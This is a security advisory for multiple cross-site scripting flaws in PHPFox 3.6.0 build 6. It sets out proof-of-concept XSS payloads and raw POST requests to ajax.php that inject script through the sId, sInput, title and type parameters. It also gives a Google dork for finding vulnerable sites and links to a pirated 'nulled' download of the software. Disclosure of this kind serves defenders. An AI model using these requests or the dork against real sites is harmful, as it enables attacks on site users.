------------------------------------------------------------ Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities ------------------------------------------------------------ Author: #BHG Security Center Date: Saturday, October 12, 2013 Vendor: http://www.phpfox.com Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip Vulnerable Version(s): v3.6.0.Build.6 is vulnerable. Tested Version: 3.6.0.Build.6 Vulnerability Type: Cross-Site Scripting Google Dork: "Powered By PHPFox Version 3.6.0"? Risk Level: High Saftware Price : 299 $ Tested on: Windows, PHP 5.2 Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature -- Vulnerability discovered by: Net.Edit0r ( Dariush Nasirpour) - Email : Black.hat.tm@gmail.com ------------------------------------------------------------ == Proof of concept == ------------------------------------------------------------ [-] Description : [-] PoC 1.1: Xss Code Injection Join Field : 1) Xss Code : <script>alert(12)</script> 2- Encode to : &lt;script&gt;alert(12)&lt;/script&gt; 3- Put in First name Sign Up 4- After Login get your mouse on Recent Logins 5- and you will see Xss Code was successful ------------------------------------------------------------ Vulnerable File(s): [+] ajax.php Vulnerable Parameter(s): [+] sId [+] sInput [+] title [+] type [-] PoC 2.2: ## URL encoded POST input ( sId & sInput ) was set to <script>alert(0)</script> ## Request POST /upload/static/ajax.php HTTP/1.1 =undefined&core[ajax]=true&core[call]=captcha.reload&core [is_admincp]=0&core[is_user_profile]=0&core[profile_user_id] =0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code] [-] PoC 3.3: ## URL encoded POST input ( title & type ) was set to " onmouseover=prompt(951977) bad=" ## Request POST /upload/static/ajax.php HTTP/1.1 core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74 &feed_id=1&height=300&is_feed_view=1&sharemodule=event &title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550 ------------------------------------------------------------ Timeline: ------------------------------------------------------------ Advisory Publication: September 18, 2013 [without technical details] Vendor Notification: September 18, 2013 Public Disclosure: October 12, 2013 #BHG Security Center # Gr33tz: # Blackhat Group Members : 3H34N,,G3n3Rall,l4tr0d3ctism,NoL1m1t,b3hz4d # HUrr!c4nE,E2MA3N,solt6n,Dj.TiniVini